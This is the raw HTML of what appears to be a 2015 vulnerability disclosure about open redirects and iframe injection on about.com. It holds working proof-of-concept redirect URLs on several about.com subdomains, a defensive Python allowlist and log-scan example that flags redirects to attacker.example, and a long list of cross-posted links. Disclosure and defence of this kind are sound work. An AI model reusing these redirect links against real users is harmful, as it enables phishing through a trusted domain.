<a href="http://jobsearch.about.com/od/coverletters/a/types-sogou-outbrain-booking-chase-pixnet-reddit-pinterest-vk-msn-imdb-of-cover-qq-letters-bankofamerica-twitter-Wikia-Etsy.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://jobsearch.about.com/od/<wbr></wbr>coverletters/a/types-sogou-<wbr></wbr>outbrain-booking-chase-pixnet-<wbr></wbr>reddit-pinterest-vk-msn-imdb-<wbr></wbr>of-cover-qq-letters-<wbr></wbr>bankofamerica-twitter-Wikia-<wbr></wbr>Etsy.htm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://testprep.about.com/od/The-Redesigned-PSAT/fl/Redesigned-PSAT-101-Flickr-Globo-Xnxx-Tudou-Yelp-Douban-Ameblo-33-Vimeo-Ettoday-Redtube-Directrev-Salesforce-Coccoc.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://testprep.about.com/od/<wbr></wbr>The-Redesigned-PSAT/fl/<wbr></wbr>Redesigned-PSAT-101-Flickr-<wbr></wbr>Globo-Xnxx-Tudou-Yelp-Douban-<wbr></wbr>Ameblo-33-Vimeo-Ettoday-<wbr></wbr>Redtube-Directrev-Salesforce-<wbr></wbr>Coccoc.htm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div style="margin: 0px;">
<a href="http://fictionwriting.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://fictionwriting.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://internationalinvest.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://internationalinvest.<wbr></wbr>about.com/gi/dynamic/offsite.<wbr></wbr>htm?zi=1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//tetraph.com</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://inventors.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//itinfotechnology.wordpress.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://inventors.about.com/gi/<wbr></wbr>dynamic/offsite.htm?zi=1/XJ/<wbr></wbr>Ya&sdn=internationalinvest&<wbr></wbr>cdn=prep&tm=2&f=21&tt=14&bt=0&<wbr></wbr>bts=1&zu=http%3A//<wbr></wbr>itinfotechnology.wordpress.com</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://sbinformation.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com/security" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://sbinformation.about.<wbr></wbr>com/gi/dynamic/offsite.htm?zi=<wbr></wbr>1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//tetraph.com/security</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://ancienthistory.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//inzeed.com/security" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://ancienthistory.about.<wbr></wbr>com/gi/dynamic/offsite.htm?zi=<wbr></wbr>1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//inzeed.com/security</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://specialchildren.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://specialchildren.about.<wbr></wbr>com/gi/dynamic/offsite.htm?zi=<wbr></wbr>1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//diebiyi.com/security</span></a></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<a href="http://womenshistory.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://womenshistory.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://budgetdecorating.about.com/o/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://budgetdecorating.about.com/o/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://makeup.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://makeup.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=hx_sdDmSkg0&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=hx_sdDmSkg0&feature=youtu.be</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
<div style="margin: 0px;">
<a href="http://tetraph.com/security/iframe-injection/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-iframe-injection-cross-frame-scripting-security-attacks/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/iframe-injection/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-iframe-injection-cross-frame-scripting-security-attacks/</span></a></div>
<div style="margin: 0px;">
<a href="http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/</span></a></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at.html</span></a></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(5) About (about.com) Open Redirect Multiple (Dest Redirect Privilege Escalation) Security Vulnerabilities</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The About Group web application has a security vulnerability that can be exploited by Unvalidated Redirects and Forwards (URL Redirection) attacks. An attacker can create a specially crafted URL that, if clicked, redirects the victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are effective because the crafted URL initially appears to point to a page on a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client-side software such as a web browser or document rendering programs.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be exploited without user login. Tests were performed on Microsoft IE (10.0.9200.16750) on Windows 8, Mozilla Firefox (34.0) and Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) on Ubuntu (14.04), and Apple Safari 6.1.6 on Mac OS X Lion 10.7.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">One web page is used for the following tests; its address is "<a href="http://www.inzeed.com/kaleidoscope/" target="_blank">http://www.inzeed.com/<wbr></wbr>kaleidoscope/</a>". Suppose that this web page is malicious.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 1:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://www.about.com/snf.htm?u=http://www.instagram.com/facebook/craigslist" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/snf.htm?<wbr></wbr>u=http://www.instagram.com/<wbr></wbr>facebook/craigslist</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://www.about.com/snf.htm?u=http://www.inzeed.com/essayjeans/poems/thatday.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/snf.htm?<wbr></wbr>u=http://www.inzeed.com/<wbr></wbr>essayjeans/poems/thatday.html</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 2:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://clk.about.com/?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://paypal.com/imgur/xinhuanet" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://clk.about.com/?zi=13/<wbr></wbr>1tO&ity=boostOrg&o=0&eng=<wbr></wbr>boost&zu=http://paypal.com/<wbr></wbr>imgur/xinhuanet</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://clk.about.com/?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://www.inzeed.com/netflix/stackoverflow" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://clk.about.com/?zi=13/<wbr></wbr>1tO&ity=boostOrg&o=0&eng=<wbr></wbr>boost&zu=http://www.inzeed.<wbr></wbr>com/netflix/stackoverflow</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 3:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://wzus1.index.about.com/r?t=v&d=im&u=http%3A%2F%2Ft.co%2fxvideos%2fsoso%2f%naver%2fkickass.so" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://wzus1.index.about.com/<wbr></wbr>r?t=v&d=im&u=http%3A%2F%2Ft.<wbr></wbr>co%2fxvideos%2fsoso%2f%naver%<wbr></wbr>2fkickass.so</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://wzus1.index.about.com/r?t=v&d=im&u=http://www.diebiyi.com/xhamster/diply/onclickads.net" target="_blank">http://wzus1.index.about.com/<wbr></wbr>r?t=v&d=im&u=http://www.<wbr></wbr>diebiyi.com/xhamster/diply/<wbr></wbr>onclickads.net</a> </span></div>
</div>
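<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Added example (not code from this advisory or from about.com): an allowlist check for the destination parameter that the redirectors above pass through unvalidated (zu= on clk.about.com, u= on wzus1.index.about.com), plus a detection pass over constructed log lines. The allowlist hosts, the endpoint-to-parameter map and the log lines are assumptions.</span></div>

```python
"""Allowlist check for a redirector's destination parameter.

Added example, not code from the advisory or from about.com. It models the
server-side check a redirector such as clk.about.com (destination in zu=) or
wzus1.index.about.com (destination in u=) needs: the destination must be an
absolute same-site path or an http(s) URL whose host is on an allowlist.
The allowlist, the endpoint-to-parameter map and the log lines are constructed.
"""
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed allowlist: the only hosts this redirector may send a visitor to.
ALLOWED_HOSTS = {"about.com", "www.about.com"}

# Assumed mapping of redirector endpoint path -> name of its destination parameter.
REDIRECT_PARAMS = {"/": "zu", "/r": "u"}


def is_safe_destination(dest: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """True only for '/path' on this site or http(s)://<allowlisted host>/..."""
    if not dest:
        return False
    # Undo nested percent-encoding (bounded) so "http%3A%2F%2F" is seen as a scheme.
    decoded = dest
    for _ in range(3):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    # Browsers treat backslashes as slashes: "/\evil" becomes protocol-relative "//evil".
    decoded = decoded.replace("\\", "/")
    # Whitespace and control characters are used to smuggle schemes past naive checks.
    if any(c.isspace() or ord(c) < 0x20 for c in decoded):
        return False
    parts = urlsplit(decoded)
    if not parts.scheme and not parts.netloc:
        # Relative destination: exactly one leading slash. A protocol-relative
        # "//host" has a netloc, so it falls through to the scheme check and fails.
        return decoded.startswith("/") and not decoded.startswith("//")
    if parts.scheme.lower() not in ("http", "https"):
        return False  # javascript:, data:, ftp:, ...
    # .hostname drops userinfo ("about.com@evil"), drops the port and lower-cases.
    host = (parts.hostname or "").rstrip(".")
    return host in allowed_hosts


def first_param(query: str, name: str) -> Optional[str]:
    """First value of a query parameter, percent-decoded by parse_qs, or None."""
    return parse_qs(query, keep_blank_values=True).get(name, [None])[0]


def check_redirector_url(url: str, param: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Would this full redirector URL be allowed to redirect?"""
    dest = first_param(urlsplit(url).query, param)
    return dest is not None and is_safe_destination(dest, allowed_hosts)


# Constructed access-log request lines (not real traffic) in "METHOD target PROTO" form.
SAMPLE_LOG = [
    "GET /?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://attacker.example/landing HTTP/1.1",
    "GET /?zi=13/1tO&zu=/topics/security HTTP/1.1",
    "GET /r?t=v&d=im&u=http%3A%2F%2Fattacker.example%2Fbait HTTP/1.1",
    "GET /r?t=v&d=im&u=%2F%2Fattacker.example%2Fbait HTTP/1.1",
]


def flag_offsite_redirects(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Detection pass: (line number, destination) for every redirector request
    that would have sent the visitor off-site. Useful for confirming a fix and
    for spotting spam campaigns that abuse the redirector."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        fields = line.split(" ")
        if len(fields) != 3:
            continue
        target = urlsplit(fields[1])
        param = REDIRECT_PARAMS.get(target.path)
        if param is None:
            continue
        dest = first_param(target.query, param)
        if dest is not None and not is_safe_destination(dest):
            hits.append((lineno, dest))
    return hits


if __name__ == "__main__":
    for lineno, dest in flag_offsite_redirects(SAMPLE_LOG):
        print(f"line {lineno}: off-site destination {dest!r}")
```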
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=8ZCUAJ44FsU&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=8ZCUAJ44FsU&feature=youtu.be</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
<div style="margin: 0px;">
<a href="http://tetraph.com/security/open-redirect/about-about-com-open-redirect-multiple-dest-redirect-privilege-escalation-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/open-redirect/about-about-com-open-redirect-multiple-dest-redirect-privilege-escalation-security-vulnerabilities/</span></a></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/02/about-aboutcom-unvalidated-redirects.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-aboutcom-unvalidated-redirects.html</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b></div>
</div>
<div style="margin: 0px;">
<div style="margin: 0px;">
<a href="http://seclists.org/fulldisclosure/2015/Feb/9"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Feb/9</span></a></div>
</div>
<div style="margin: 0px;">
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/02/02/4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/02/02/4</span></a></div>
</div>
<div style="margin: 0px;">
<div style="margin: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01647.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01647.html</span></a></div>
</div>
<div style="margin: 0px;">
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_37.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_37.html</span></a></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-iframe-injection-security-attacks-about-com-open-redirect-security-vulnerabilities/">http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://webcabinet.tumblr.com/post/118901412227/securitypost-about-group-99-88-xss"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webcabinet.tumblr.com/post/118901412227/securitypost-about-group-99-88-xss</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://xingzhehong.lofter.com/post/1cfd0db2_6f05d60"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://xingzhehong.lofter.com/post/1cfd0db2_6f05d60</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://hackertopic.wordpress.com/2015/02/03/about-group-xss-xfs/" target="_blank">https://hackertopic.wordpress.<wbr></wbr>com/2015/02/03/about-group-<wbr></wbr>xss-xfs/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itinfotech.tumblr.com/post/120845059171/about-group-xss-xfs" target="_blank">http://itinfotech.tumblr.com/<wbr></wbr>post/120845059171/about-group-<wbr></wbr>xss-xfs</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itprompt.blogspot.com/2015/06/about-group-xss-xfs.html">http://itprompt.blogspot.com/<wbr></wbr>2015/06/about-group-xss-xfs.<wbr></wbr>html</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://plus.google.com/u/0/100242269120759811496/posts/T3SbFnTZGAo"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/100242269120759811496/posts/T3SbFnTZGAo</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://itinfotechnology.wordpress.com/2015/03/24/about-group-%E8%B6%85%E8%BF%87-99-88-%E7%9A%84%E9%93%BE%E6%8E%A5%E5%AE%B9%E6%98%93%E9%81%AD%E5%8F%97-xss-%E5%92%8C-xfs-%E6%94%BB%E5%87%BB/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itinfotechnology.wordpress.com/2015/03/24/about-group</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/websecuritiesnews/posts/803853789734793">https://www.facebook.com/websecuritiesnews/posts/803853789734793</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://twitter.com/essayjeans/status/607137800383655936"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/essayjeans/status/607137800383655936</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/2346030512015566409245/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/2346030512015566409245/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="color: black; font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/pcwebsecurities/posts/687872271358693">https://www.facebook.com/pcwebsecurities/posts/687872271358693</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itsecurity.lofter.com/post/1cfbf9e7_733e1e5">http://itsecurity.lofter.com/post/1cfbf9e7_733e1e5</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://webtechwire.wordpress.com/2015/02/12/about-xss-xfs/">https://webtechwire.wordpress.com/2015/02/12/about-xss-xfs/</a></span></div>
</div>
